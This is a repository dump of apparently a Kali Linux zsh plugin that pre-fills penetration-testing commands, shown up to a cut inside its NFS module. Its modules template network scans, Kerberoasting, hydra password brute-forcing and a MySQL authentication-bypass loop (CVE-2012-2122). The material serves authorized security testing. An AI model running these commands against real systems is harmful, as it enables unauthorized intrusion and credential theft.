Repository: stevemcilwain/quiver Branch: master Commit: 64cc42a29341 Files: 76 Total size: 179.8 KB Directory structure: gitextract_8lk53koa/ ├── .gitattributes ├── .gitignore ├── .vscode/ │ └── settings.json ├── LICENSE ├── README.md ├── RELEASES.md ├── VERSION ├── modules/ │ ├── qq-encoding.zsh │ ├── qq-enum-dhcp.zsh │ ├── qq-enum-dns.zsh │ ├── qq-enum-ftp.zsh │ ├── qq-enum-host.zsh │ ├── qq-enum-kerb.zsh │ ├── qq-enum-ldap.zsh │ ├── qq-enum-mssql.zsh │ ├── qq-enum-mysql.zsh │ ├── qq-enum-network.zsh │ ├── qq-enum-nfs.zsh │ ├── qq-enum-oracle.zsh │ ├── qq-enum-pop3.zsh │ ├── qq-enum-rdp.zsh │ ├── qq-enum-smb.zsh │ ├── qq-enum-web-aws.zsh │ ├── qq-enum-web-dirs.zsh │ ├── qq-enum-web-eslastic.zsh │ ├── qq-enum-web-fuzz.zsh │ ├── qq-enum-web-js.zsh │ ├── qq-enum-web-php.zsh │ ├── qq-enum-web-ssl.zsh │ ├── qq-enum-web-vuln.zsh │ ├── qq-enum-web.zsh │ ├── qq-exploit.zsh │ ├── qq-install.zsh │ ├── qq-kali.zsh │ ├── qq-log.zsh │ ├── qq-notes.zsh │ ├── qq-pivot.zsh │ ├── qq-project-custom.zsh │ ├── qq-project.zsh │ ├── qq-recon-domains.zsh │ ├── qq-recon-github.zsh │ ├── qq-recon-networks.zsh │ ├── qq-recon-org.zsh │ ├── qq-recon-subs.zsh │ ├── qq-scripts.zsh │ ├── qq-shell-handlers-msf.zsh │ ├── qq-shell-handlers.zsh │ ├── qq-shell-tty.zsh │ ├── qq-srv.zsh │ ├── qq-vars-global.zsh │ ├── qq-vars.zsh │ └── qq.zsh ├── payloads/ │ ├── aka.ms.pem │ ├── aliases.rc │ ├── github-dorks-commits.txt │ ├── msf-windows-payloads.txt │ ├── recon-dorks-github.txt │ ├── recon-dorks-google.txt │ ├── resolvers.txt │ ├── secrets-content.json │ ├── secrets-files.json │ ├── tcp-ports.txt │ ├── user-agents.txt │ ├── web-file-upload-bypass-bytes.txt │ ├── web-file-upload-bypass.txt │ ├── wordlist-api.txt │ └── wordlists.txt ├── quiver.code-workspace ├── quiver.plugin.zsh ├── scripts/ │ ├── dns-reverse-brute.zsh │ ├── image-gen.js │ ├── recon.zsh │ ├── webrecon.zsh │ ├── wildcards.py │ └── wildcards.sh └── system/ └── hidpi.sh ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitattributes ================================================ # Auto detect text files and perform LF normalization * text=auto ================================================ FILE: .gitignore ================================================ # ignore qq-custom.zsh module modules/qq-custom.zsh log.txt remote_checked.txt remote_ver.txt ================================================ FILE: .vscode/settings.json ================================================ { "editor.detectIndentation": false } ================================================ FILE: LICENSE ================================================ MIT License Copyright (c) 2020 Steve McIlwain Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ================================================ FILE: README.md ================================================ # Quiver : A Meta-Tool for Kali Linux Quiver is an organized namespace of shell functions that pre-fill commands in your terminal so that you can ditch your reliance on notes, copying, pasting, editing, copying and pasting again. Quiver helps you remember how to use every tool in your arsenal and doesn't hide them behind scripting that can be cumbersome to maintain or update. Instead you can use Quiver to build a composable, on-the-fly workflow for every situation. Quiver doesn't cover all tools, it's my own curated collection which I am still adding to and updating. There are so many tools for many different types of engagements and targets, so I jsut try to focus on tools that are maintained and current. Feel free to ask for the inclusion of tools you prefer in the issues list. # Release 1.0 After months of hard work during lockdown, I am happy to introduce the 1.0 release of Quiver! This version contains many improvements over previous versions such as per-namespace help and installers, auto-fill variables such as RHOST, RPORT, LHOST, LPORT, PROJECT, WORDLIST, URL and global configuration settings for customizing settings like a menu of your favorite wordlists. If you've been using Quiver before now, then many of the changes in 1.0 are breaking changes. Please familiarize yourself with the new commands using `qq-help`. If you previously were storing Quiver values in .zshrc, most of these can now be stored as global vars using `qq-vars-global`. * [RELEASES.md](RELEASES.md) # Features * Prefills the commands within a terminal * Well-organized commands with tab auto-completion * Installs as a ZSH / Oh-My-ZSH shell plugin * Customizable settings, Global variables * Recon phase commands for OSINT * Enumeration of common services * Web enumeration, brute-forcing and hacking * Exploit compilation helpers * Reverse shell handlers * Content serving commands * Built-in logbook for on-the-fly notes, saving commands * Render markdown notes to the command line * Kali Linux system management * Update notification and install * Installers for dependencies # Installation Quiver requires the following: * ZSH (apt-get install zsh) * oh-my-zsh (optional requirement but recommended: https://ohmyz.sh/) * Kali Linux (https://kali.org) Clone the repo to your OMZ custom plugins folder. ```bash git clone https://github.com/stevemcilwain/quiver.git ~/.oh-my-zsh/custom/plugins/quiver ``` Edit ~/.zshrc to load the plugin. ``` plugins=(git quiver) ``` Source .zshrc to load the plugin and you're done. On first load, Quiver will install a few core packages. ``` source ~/.zshrc ``` ## Getting Started Quiver organizes commands into namespaces starting with `qq-`, such as `qq-enum-web` or `qq-recon-domains`. To see an overview of all namespaces simply use `qq-help`. Each namespace also has it's own help command, such as `qq-enum-web-help` that provides a listing of available commands. All commands support tab completion and search. ## Installing Dependencies Every namespace was a qq--install command that will install all of the tools relavent to that namespace. You can install just the tools you need, or use `qq-install-all` to run the installers of all namespaces. ## Workflow Quiver is meant to provide a composable, on-the-fly workflow. It replaces the common painful raw workflow of reading your notes, finding a command, copy, paste, replace the values with target values, copy, paste, run. Some rely heavily on completely automated scripts or frameworks that run all the commands for a workflow and output well-formatted data. While these scripts are great for many use cases, they can often be brittle, hide the underlying tools and techniques and be cumbersom to modify. Instead, Quiver gives you a happy medium, you can run commands quickly and easy with well-organized output, composing your workflow as you go depending on the targets and context. ## Example Workflow Here is an example workflow for bug bounty hunting: ### Prep ```bash # if you have markdown notes, configure the path qq-vars-global-set-notes # set some session variables for the bounty target qq-vars-set-project qq-vars-set-domain # generate scope files from the bounty url qq-project-rescope # save vars for other terminal sessions, qq-vars-load qq-vars-save ``` ### Passive Recon ```bash # search for target files qq-recon-org-files # search downloaded files for urls qq-recon-org-files-urls # mine github repos for secrets qq-recon-github-gitrob # check dns records qq-enum-dns-dnsrecon # look for ASNs and networks qq-recon-networks-amass-asns qq-recon-networks-bgpview-ipv4 # get subdomains qq-recon-subs-subfinder # resolve and parse subdomains qq-recon-subs-resolve-massdns qq-recon-subs-resolve-parse ``` ### Active Web Enumeration ```bash # Download out robots.txt qq-enum-web-dirs-robots # ID a WAF if present qq-enum-web-waf # Parse SSL certs qq-enum-web-ssl-certs # Spider the site qq-enum-web-gospider # Brute force URIs qq-enum-web-dirs-ffuf # Read your notes qq-notes ``` ================================================ FILE: RELEASES.md ================================================ # Releases ## 1.0 6/4/2020 Complete refactor and reorganization, including: * Added qq--help commands to all modules * Added qq--install commands to all modules * More variables that auto-populate in qq-vars * Persistent variables in qq-vars-global for customization of settings * New qq-shell namespaces * Better organization in qq-recon namespaces * qq-bounty consolidated into qq-project, custom project commands moved to qq-project-custom * qq-notes updated with more features * New qq-kali namespace added with system commands * qq-install refactored to include custom installers * New qq-exploit namespace added * New qq-enum-* namespaces added for more services ## 0.16 3/28/2020 * Fixed qq-bounty.zsh * Fixed qq-project.zsh: logfile and output settings * Fixed qq-vars.zsh recursively creating directories in __OUTPUT ## 0.15 3/24/2020 * Added qq-enum-mssql.zsh * Added qq-enum-mysql.zsh * Added qq-enum-oracle.zsh * Added qq-enum-nfs.zsh * Added qq-enum-pop3.zsh * qq-srv.zsh: added 3 new listeners for tar, nc>file and b64 ## 0.14 3/24/2020 * quiver.plugin.zsh: added zstyle tab autocompletion ** use qq- to search for commands across any namespace * qq-install.zsh ** added jsbeautifier * qq-vars.zsh: set-output will now create the root directory if missing ## 0.12 3/22/2020 * qq-vars.zsh: Added global variables for the most common arguments, load and save * qq-srv.zsh: added updog * qq-project.zsh added folder scaffolding for projects / engagements * qq-log.zsh integration with qq-vars * Major change to output on all methods, uses $__OUTPUT as the directory from qq-vars.zsh * Lot of minor changes ## 0.11 - 3/9/2020 * You can now specify a path to your markdown notes by setting $__NOTES * qq-notes.zsh: notes search and display * qq-exploit.zsh: compilation helpers * qq-enum-web-php: php specific enumeration such as lfi, rfi and scans * minor fixes ## 0.10 - 3/4/2020 * Added module: qq-enum-kerb.zsh for kerboros enumeration functions * Added module: qq-enum-rdp.zsh for RDP enumeration functions * Added module: qq-enum-smb.zsh for SMB enumeration functions * Aded qq-debug to print ~/.quiver/log.txt * Fixed glow commands to not use pager, leaving the output available in the console window ## 0.9 - 3/4/2020 * Minor fixes and improvements * Added scripts/recon.zsh * Added qq-bounty for bug bounty helpers * Added rescope to install script and qq-bounty * Added qq-enum-ldap * Removed noisy banner and log loading to ./quiver/log.txt * Added qq-enum-ftp-notes-vsftp * Added qq-custom.zsh module for your custom aliases and functions (ignored) * Added .gitignore (for qq-custom.zsh) ## 0.8 - 2/25/2020 * qq-pivot: added ssh tunneling commands * qq-log: added short aliases * qq-enum-web: moved fuzzing to qq-enum-web-fuzz * qq-enum-web-fuzz: added/grouped (not dirs) fuzzing commands * qq-enum-web-xss: added XSS helpers * qq-enum-web-ssl: added SSL commands and notes * qq-aliases: better organization, added aliases for custom functions ================================================ FILE: VERSION ================================================ 1.0.0 ================================================ FILE: modules/qq-encoding.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-encoding ############################################################# qq-encoding-help() { cat << "DOC" qq-encoding ---------- The encoding namespace provides commands for encoding and decoding values. Commands -------- qq-encoding-file-to-b64: encodes plain text file to base64, optional $1 as file qq-encoding-file-from-b64: decodes base64 file to plain text, optional $1 as file DOC } qq-encoding-file-to-b64() { if [ "$#" -eq "1" ] then print -z "cat $1 | base64 > $1.b64" else local f && __askpath f FILE $(pwd) print -z "cat ${f} | base64 > ${f}.b64" fi } qq-encoding-file-from-b64() { if [ "$#" -eq "1" ] then print -z "cat $1 | base64 -d > $1.txt" else local f && __askpath f FILE $(pwd) print -z "cat ${f} | base64 -d > ${f}.txt" fi } ================================================ FILE: modules/qq-enum-dhcp.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-dhcp ############################################################# qq-enum-dhcp-help() { cat << "DOC" qq-enum-dhcp ------------- The qq-enum-dhcp namespace contains commands for scanning and enumerating DHCP servers. Commands -------- qq-enum-dhcp-install: installs dependencies qq-enum-dhcp-nmap-sweep: scan a network for services qq-enum-dhcp-tcpdump: capture traffic to and from a host qq-enum-dhcp-discover-nmap: broadcast DHCP discover packets DOC } qq-enum-dhcp-install() { __info "Running $0..." __pkgs tcpdump nmap } qq-enum-dhcp-sweep-nmap() { __check-project qq-vars-set-network print -z "sudo nmap -n -Pn -sU -p67 ${__NETWORK} -oA $(__netpath)/dhcp-sweep" } qq-enum-dhcp-tcpdump() { __check-project qq-vars-set-iface qq-vars-set-rhost print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and udp port 67 and port 68 -w $(__hostpath)/dhcp.pcap" } qq-enum-dhcp-discover-nmap() { print -z "sudo nmap -v --script broadcast-dhcp-discover" } ================================================ FILE: modules/qq-enum-dns.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-dns ############################################################# qq-enum-dns-help() { cat << "DOC" qq-enum-dns ------------- The qq-enum-dns namespace contains commands for scanning and enumerating DNS records and servers. Commands are executed against specific name servers (__RHOST) rather than public resolvers. Commands -------- qq-enum-dns-install: installs dependencies qq-enum-dns-nmap-sweep: scan a network for services qq-enum-dns-tcpdump: capture traffic to and from a host qq-enum-dns-host-txfr: attempt a zone transfer qq-enum-dns-host-all: list all types qq-enum-dns-host-txt: list txt records qq-enum-dns-host-mx: list mx records qq-enum-dns-host-ns: list ns records qq-enum-dns-host-srv: list srv records qq-enum-dns-nmap-ad: discover Active Directory related records qq-enum-dns-dnsrecon: discover dns records, servers and attempt zone txfrs qq-enum-dns-dnsrecon-reverse: do reverse lookups on an IP network DOC } qq-enum-dns-install() { __info "Running $0..." __pkgs tcpdump nmap dnsutils dnsrecon } qq-enum-dns-nmap-sweep() { __check-project qq-vars-set-network print -z "sudo nmap -n -Pn -sS -sU -p53 ${__NETWORK} -oA $(__netpath)/dns-sweep" } qq-enum-dns-tcpdump() { __check-project __check-iface qq-vars-set-rhost print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 53 -w $(__hostpath)/dns.pcap" } qq-enum-dns-host-txfr() { qq-vars-set-rhost qq-vars-set-domain print -z "host -l ${__DOMAIN} ${__RHOST}" } qq-enum-dns-host-all() { qq-vars-set-domain qq-vars-set-rhost print -z "host -a ${__DOMAIN} ${__RHOST}" } qq-enum-dns-host-txt() { qq-vars-set-domain qq-vars-set-rhost print -z "host -t txt ${__DOMAIN} ${__RHOST}" } qq-enum-dns-host-mx() { qq-vars-set-domain qq-vars-set-rhost print -z "host -t mx ${__DOMAIN} ${__RHOST}" } qq-enum-dns-host-ns() { qq-vars-set-domain qq-vars-set-rhost print -z "host -t ns ${__DOMAIN} ${__RHOST}" } qq-enum-dns-host-srv() { qq-vars-set-domain qq-vars-set-rhost print -z "host -t srv ${__DOMAIN} ${__RHOST}" } qq-enum-dns-nmap-ad() { __check-project qq-vars-set-domain qq-vars-set-rhost print -z "nmap --script dns-srv-enum --script-args dns-srv-enum.domain=${__DOMAIN} ${__RHOST} -o $(__dompath)/nmap-AD.txt" } qq-enum-dns-dnsrecon() { __check-project qq-vars-set-domain qq-vars-set-rhost print -z "dnsrecon -d ${__DOMAIN} -n ${__RHOST} -a -s -w -z --threads 10 -c $(__dompath)/dns.csv" } qq-enum-dns-dnsrecon-reverse() { __check-project qq-vars-set-rhost mkdir -p ${__PROJECT}/domains print -z "dnsrecon -r ${__NETWORK} -n ${__RHOST} -c ${__PROJECT}/domains/revdns.csv" } ================================================ FILE: modules/qq-enum-ftp.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-ftp ############################################################# qq-enum-ftp-help() { cat << "DOC" qq-enum-ftp ------------- The qq-enum-ftp namespace contains commands for scanning and enumerating FTP servers. Commands -------- qq-enum-ftp-install: installs dependencies qq-enum-ftp-nmap-sweep: scan a network for services qq-enum-ftp-tcpdump: capture traffic to and from a host qq-enum-ftp-hydra: brute force passwords for a user account qq-enum-ftp-lftp-grep: search (grep) the target system qq-enum-ftp-wget-mirror: mirror the FTP server locally DOC } qq-enum-ftp-install() { __info "Running $0..." __pkgs tcpdump nmap hydra ftp lftp wget } qq-enum-ftp-sweep-nmap() { __check-project qq-vars-set-network print -z "sudo nmap -n -Pn -sS -p21 ${__NETWORK} -oA $(__netpath)/ftp-sweep" } qq-enum-ftp-tcpdump() { __check-project qq-vars-set-iface qq-vars-set-rhost print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 21 -w $(__hostpath)/ftp.pcap" } qq-enum-ftp-hydra() { __check-project qq-vars-set-rhost __check-user print -z "hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/ftp-hydra-brute.txt ${__RHOST} FTP" } qq-enum-ftp-lftp-grep() { qq-vars-set-rhost local q && __askvar q QUERY print -z "lftp ${__RHOST}:/ > find | grep -i \"${QUERY}\" " } qq-enum-ftp-wget-mirror() { __warn "The destination site will be mirrored in the current directory" qq-vars-set-rhost local u && __prefill u USER "anonymous" local p && __prefill p PASSWORD "anonymous@example.com" print -z "wget --mirror ftp://${u}:${p}@${__RHOST}" } ================================================ FILE: modules/qq-enum-host.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-host ############################################################# qq-enum-host-help() { cat << "DOC" qq-enum-host ------------- The qq-enum-host namespace contains commands for scanning and enumerating an individual host. Commands -------- qq-enum-host-install: installs dependencies qq-enum-host-tcpdump: capture traffic to and from a host qq-enum-host-nmap-top: syn scan of the top 1000 ports qq-enum-host-nmap-top-discovery: syn scan of the top 1000 ports with versioning and scripts qq-enum-host-nmap-all: syn scan all ports qq-enum-host-nmap-all-discovery: syn scan all ports with versioning and scripts qq-enum-host-nmap-udp: udp scan top 100 ports qq-enum-host-masscan-all-tcp: scan all tcp ports qq-enum-host-masscan-all-udp: scan all udp ports qq-enum-host-nmap-lse-grep: search nmap lse scripts DOC } qq-enum-host-install() { __info "Running $0..." __pkgs tcpdump nmap masscan curl } qq-enum-host-tcpdump() { __check-project __check-iface qq-vars-set-rhost print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} -w $(__hostpath)/tcpdump.pcap" } qq-enum-host-nmap-top(){ __check-project qq-vars-set-rhost print -z "sudo nmap -vvv -Pn -sS --top-ports 1000 --open ${__RHOST} -oA $(__hostpath)/nmap-top" } qq-enum-host-nmap-top-discovery(){ __check-project qq-vars-set-rhost print -z "sudo nmap -vvv -Pn -sS --top-ports 1000 --open -sC -sV ${__RHOST} -oA $(__hostpath)/nmap-top-discovery" } qq-enum-host-nmap-all() { __check-project qq-vars-set-rhost print -z "sudo nmap -vvv -Pn -sS -p- -T4 --open ${__RHOST} -oA $(__hostpath)/nmap-all" } qq-enum-host-nmap-all-discovery() { __check-project qq-vars-set-rhost print -z "sudo nmap -vvv -Pn -sS -p- -sC -sV --open ${__RHOST} -oA $(__hostpath)/nmap-all-discovery" } qq-enum-host-nmap-udp() { __check-project qq-vars-set-rhost print -z "sudo nmap -v -Pn -sU --top-ports 100 -sV -sC --open ${__RHOST} -oA $(__hostpath)/nmap-udp" } qq-enum-host-masscan-all-tcp() { __check-iface __check-project qq-vars-set-rhost print -z "masscan -p1-65535 --open-only ${__RHOST} --rate=1000 -e ${__IFACE} -oL $(__hostpath)/masscan-all-tcp.txt" } qq-enum-host-masscan-all-udp() { __check-iface __check-project qq-vars-set-rhost print -z "masscan -pU:1-65535 --open-only ${__RHOST} --rate=1000 -e ${__IFACE} -oL $(__hostpath)/masscan-all-udp.txt" } qq-enum-host-nmap-lse-grep() { local q && __askvar q QUERY print -z "ls /usr/share/nmap/scripts/* | grep -ie \"${q}\" " } qq-enum-host-ip() { __check-project qq-vars-set-rhost print -z "curl -s \"https://iplist.cc/api/${__RHOST}\" | tee $(__hostpath/ip.json) " } ================================================ FILE: modules/qq-enum-kerb.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-kerb ############################################################# qq-enum-kerb-help() { cat << "DOC" qq-enum-kerb ------------ The qq-enum-kerb namespace contains commands for scanning and enumerating kerberos records and servers. Commands -------- qq-enum-kerb-install: installs dependencies qq-enum-kerb-nmap-sweep: scan a network for services qq-enum-kerb-tcpdump: capture traffic to and from a host qq-enum-kerb-users: enumerate domain users qq-enum-kerb-kerberoast: get SPN for a service account DOC } qq-enum-kerb-install() { __info "Running $0..." __pkgs tcpdump nmap impacket-scripts } qq-enum-kerb-nmap-sweep() { __check-project qq-vars-set-network print -z "sudo nmap -n -Pn -sS -p88 ${__NETWORK} -oA $(__netpath)/kerb-sweep" } qq-enum-kerb-tcpdump() { __check-project qq-vars-set-iface qq-vars-set-rhost print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 88 -w $(__hostpath)/kerb.pcap" } qq-enum-kerb-users() { qq-vars-set-rhost local realm && __askvar realm REALM print -z "nmap -vvv -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=${realm},userdb=/usr/share/seclists/Usernames/Names/names.txt ${__RHOST}" } qq-enum-kerb-kerberoast() { __ask "Enter target AD domain (must also be set in your hosts file)" qq-vars-set-domain __ask "Enter service user account" __check-user __ask "Enter the IP address of the target domain controller" qq-vars-set-rhost print -z "impacket-GetUserSPNs -request ${__DOMAIN}s/${__USER} -dc-ip ${__RHOST} " } ================================================ FILE: modules/qq-enum-ldap.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-ldap ############################################################# qq-enum-ldap-help() { cat << "DOC" qq-enum-ldap ------------ The qq-enum-ldap namespace contains commands for scanning and enumerating Active Directory DC, GC and LDAP servers. Commands -------- qq-enum-ldap-install: installs dependencies qq-enum-ldap-nmap-sweep: scan a network for services qq-enum-ldap-tcpdump: capture traffic to and from a host qq-enum-ldap-ctx: query ldap naming contexts qq-enum-ldap-search-anon: connect with anonymous bind and query ldap qq-enum-ldap-search-auth: connect with authenticated bind and query ldap qq-enum-ldap-whoami: send ldap whoami request qq-enum-ldap-hydra: brute force passwords for a user account DOC } qq-enum-ldap-install() { __info "Running $0..." __pkgs tcpdump nmap ldap-utils hydra } qq-enum-ldap-nmap-sweep() { __check-project qq-vars-set-network print -z "sudo nmap -n -Pn -sS -sU -p389,636,3269 ${__NETWORK} -oA $(__netpath)/ldap-sweep" } qq-enum-ldap-tcpdump() { __check-project qq-vars-set-iface qq-vars-set-rhost print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 389 and port 636 and port 3269 -w $(__hostpath)/ldap.pcap" } qq-enum-ldap-ctx() { __ask "Enter the address of the target DC, GC or LDAP server" qq-vars-set-rhost print -z "ldapsearch -x -h ${__RHOST} -s base namingcontexts" } qq-enum-ldap-search-anon() { __ask "Enter the address of the target DC, GC or LDAP server" qq-vars-set-rhost __ask "Enter a distinguished name (DN), such as: DC=example,DC=com" local dn && __askvar dn DN print -z "ldapsearch -x -h ${__RHOST} -s sub -b \"${dn}\" " } qq-enum-ldap-search-auth() { __ask "Enter the address of the target DC, GC or LDAP server" qq-vars-set-rhost __ask "Enter a distinguished name (DN), such as: DC=example,DC=com" local dn && __askvar dn DN __ask "Enter a user account with bind and read permissions to the directory" __check-user print -z "ldapsearch -x -h ${__RHOST} -D '${dn}' \"(objectClass=*)\" -w \"${__USER}\" " } qq-enum-ldap-whoami() { __ask "Enter the address of the target DC, GC or LDAP server" qq-vars-set-rhost print -z "ldapwhoami -h ${__RHOST} -w \"non-existing-user\" " } qq-enum-ldap-hydra() { __check-project qq-vars-set-rhost __check-user print -z "hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/ldap-hydra-brute.txt ${__RHOST} LDAP" } ================================================ FILE: modules/qq-enum-mssql.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-mssql ############################################################# qq-enum-mssql-help() { cat << "DOC" qq-enum-mssql ------------- The qq-enum-mssql namespace contains commands for scanning and enumerating MS SQL Server services and databases. Commands -------- qq-enum-mssql-install: installs dependencies qq-enum-mssql-nmap-sweep: scan a network for services qq-enum-mssql-tcpdump: capture traffic to and from a host qq-enum-mssql-sqsh: make an interactive database connection qq-enum-mssql-impacket-client: connect using impacket as a sql client qq-enum-mssql-hydra: brute force passwords for a user account DOC } qq-enum-mssql-install() { __info "Running $0..." __pkgs tcpdump nmap sqsh impacket-scripts hydra } qq-enum-mssql-nmap-sweep() { __check-project qq-vars-set-network print -z "sudo nmap -n -Pn -sS -sU -p T:1433,U:1434 ${__NETWORK} -oA $(__netpath)/mssql-sweep" } qq-enum-mssql-tcpdump() { __check-project qq-vars-set-iface qq-vars-set-rhost print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 1433 -w $(__hostpath)/mssql.pcap" } qq-enum-mssql-sqsh() { __check-project qq-vars-set-rhost __check-user print -z "sqsh -S ${__RHOST} -U ${__USER}" } qq-enum-mssql-impacket-client() { qq-vars-set-rhost __check-user local db && __askvar db DATABASE print -z "python3 ${__IMPACKET}/mssqlclient.py ${__USER}@${__RHOST} -db ${db} -windows-auth " } qq-enum-mssql-hydra() { __check-project qq-vars-set-rhost __check-user print -z "hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/mssql-hydra-brute.txt ${__RHOST} MS-SQL" } ================================================ FILE: modules/qq-enum-mysql.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-mmysql ############################################################# qq-enum-mysql-help() { cat << "DOC" qq-enum-mysql ------------- The qq-enum-mysql namespace contains commands for scanning and enumerating mysql server services and databases. Commands -------- qq-enum-mysql-install: installs dependencies qq-enum-mysql-nmap-sweep: scan a network for services qq-enum-mysql-tcpdump: capture traffic to and from a host qq-enum-mysql-client: connect using the mysql client qq-enum-mysql-auth-bypass: attempt auth bypass qq-enum-mysql-hydra: brute force passwords for a user account DOC } qq-enum-mysql-install() { __info "Running $0..." __pkgs tcpdump nmap mysql } qq-enum-mysql-nmap-sweep() { __check-project qq-vars-set-network print -z "sudo nmap -n -Pn -sS -p 3306 ${__NETWORK} -oA $(__netpath)/mysql-sweep" } qq-enum-mysql-tcpdump() { __check-project qq-vars-set-iface qq-vars-set-rhost print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 3306 -w $(__hostpath)/mysql.pcap" } qq-enum-mysql-client(){ qq-vars-set-rhost __check-user print -z "mysql -u ${__USER} -p -h ${__RHOST}" } qq-enum-mysql-auth-bypass() { qq-vars-set-rhost __info "CVE-2012-2122" print -z "for i in {1..1000}; do mysql -u root --password=bad -h ${__RHOST} 2>/dev/null; done" } qq-enum-mysql-hydra() { __check-project qq-vars-set-rhost __check-user local db && __prefill db DATABASE mysql print -z "hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/mysql-hydra-brute.txt ${__RHOST} MYSQL ${db}" } ================================================ FILE: modules/qq-enum-network.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-network ############################################################# qq-enum-network-help() { cat << "DOC" qq-enum-network ------------- The qq-enum-network namespace contains commands for scanning and enumerating a network. Commands -------- qq-enum-network-install: installs dependencies qq-enum-network-tcpdump: capture traffic to and from a network qq-enum-network-tcpdump-bcasts: capture ethernet broadcasts and multi-cast traffic qq-enum-network-nmap-ping-sweep: sweep a network with ping requests qq-enum-network-nmap-syn-sweep: sweep a network with TCP syn requests, top 1000 ports qq-enum-network-nmap-udp-sweep: sweep a network with UDP requests, top 100 ports qq-enum-network-nmap-all-sweep: sweep a network with TCP syn requests, all ports qq-enum-network-nmap-discovery: sweep a network with TCP syn requests and scripts, top 100 ports qq-enum-network-masscan-top: sweep a network with TCP requests, uses $__TCP_PORTS global var qq-enum-network-masscan-windows: sweep a network for common Windows ports qq-enum-network-masscan-linux: sweep a network for common Linux ports qq-enum-network-masscan-web: sweep a network for common web server ports DOC } qq-enum-network-install() { __info "Running $0..." __pkgs tcpdump nmap masscan } qq-enum-network-tcpdump() { __check-project qq-vars-set-iface qq-vars-set-network print -z "sudo tcpdump -i ${__IFACE} net ${__NETWORK} -w $(__netpath)/network.pcap" } qq-enum-network-tcpdump-bcasts() { __check-project qq-vars-set-iface print -z "sudo tcpdump -i ${__IFACE} ether broadcast and ether multicast -w $__PROJECT/networks/bcasts.pcap" } qq-enum-network-nmap-ping-sweep() { __check-project qq-vars-set-network print -z "nmap -vvv -sn --open ${__NETWORK} -oA $(__netpath)/nmap-ping-sweep" } qq-enum-network-nmap-syn-sweep() { __check-project qq-vars-set-network print -z "sudo nmap -vvv -n -Pn -sS --open --top-ports 100 ${__NETWORK} -oA $(__netpath)/nmap-syn-sweep" } qq-enum-network-nmap-udp-sweep() { __check-project qq-vars-set-network print -z "sudo nmap -vvv -n -Pn -sU --open --top-ports 100 ${__NETWORK} -oA $(__netpath)/nmap-udp-sweep" } qq-enum-network-nmap-all-sweep() { __check-project qq-vars-set-network print -z "sudo nmap -vvv -n -Pn -T4 --open -sS -p- ${__NETWORK} -oA $(__netpath)/nmap-all-sweep" } qq-enum-network-nmap-discovery() { __check-project qq-vars-set-network print -z "nmap -vvv -n -Pn -sV -sC --top-ports 100 ${__NETWORK} -oA $(__netpath)/nmap-discovery" } qq-enum-network-masscan-top() { __check-project qq-vars-set-network print -z "sudo masscan ${__NETWORK} -p${__TCP_PORTS} -oL $(__netpath)/masscan-top.txt" } qq-enum-network-masscan-windows() { __check-project qq-vars-set-network print -z "sudo masscan ${__NETWORK} -p135-139,445,3389,389,636,88 -oL $(__netpath)/masscan-windows.txt" } qq-enum-network-masscan-linux() { __check-project qq-vars-set-network print -z "sudo masscan ${__NETWORK} -p22,111,2222 -oL $(__netpath)/masscan-linux.txt" } qq-enum-network-masscan-web() { __check-project qq-vars-set-network print -z "sudo masscan ${__NETWORK} -p80,800,8000,8080,8888,443,4433,4443 -oL $(__netpath)/masscan-web.txt" } ================================================ FILE: modules/qq-enum-nfs.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-nfs ############################################################# qq-enum-nfs-help() { cat << "DOC" qq-enum-nfs ----------- The qq-enum-nfs namespace contains commands for scanning and enumerating NFS services. Commands -------- qq-enum-nfs-install: installs dependencies qq-enum-nfs-nmap-sweep: scan a network for services qq-enum-nfs-tcpdump: capture traffic to and from a host qq-enum-nfs-show: show remote NFS shares qq-enum-nfs-mount: mount a remote NFS share locally DOC } qq-enum-nfs-install() { __info "Running $0..." __pkgs tcpdump nmap nfs-common } qq-enum-nfs-nmap-sweep() { __check-project qq-vars-set-network print -z "sudo nmap -n -Pn -sS -sU -p U:111,T:111,U:2049,T:2049 ${__NETWORK} -oA $(__netpath)/nfs-sweep" } qq-enum-nfs-tcpdump() { __check-project qq-vars-set-iface qq-vars-set-rhost print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp 